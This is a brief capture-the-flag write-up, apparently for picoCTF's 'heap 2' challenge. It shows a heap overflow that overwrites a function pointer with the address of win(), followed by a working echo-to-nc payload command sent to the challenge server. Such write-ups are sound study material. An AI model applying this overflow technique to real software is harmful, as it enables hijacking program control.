heap 2

void check_win() { ((void (*)())*(int*)x)(); }

The write buffer is 32 bytes away from x, which has to be overwritten to address of function win() \ objdump or gdb gives the address: 0x00000000004011a0

Pass this (after taking care of endianness) with 32 a's:

echo -e -n "2\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa0\x11\x40\x00\x00\x00\x00\x00\n1\n3\n4\n" | nc mimas.picoctf.net 53134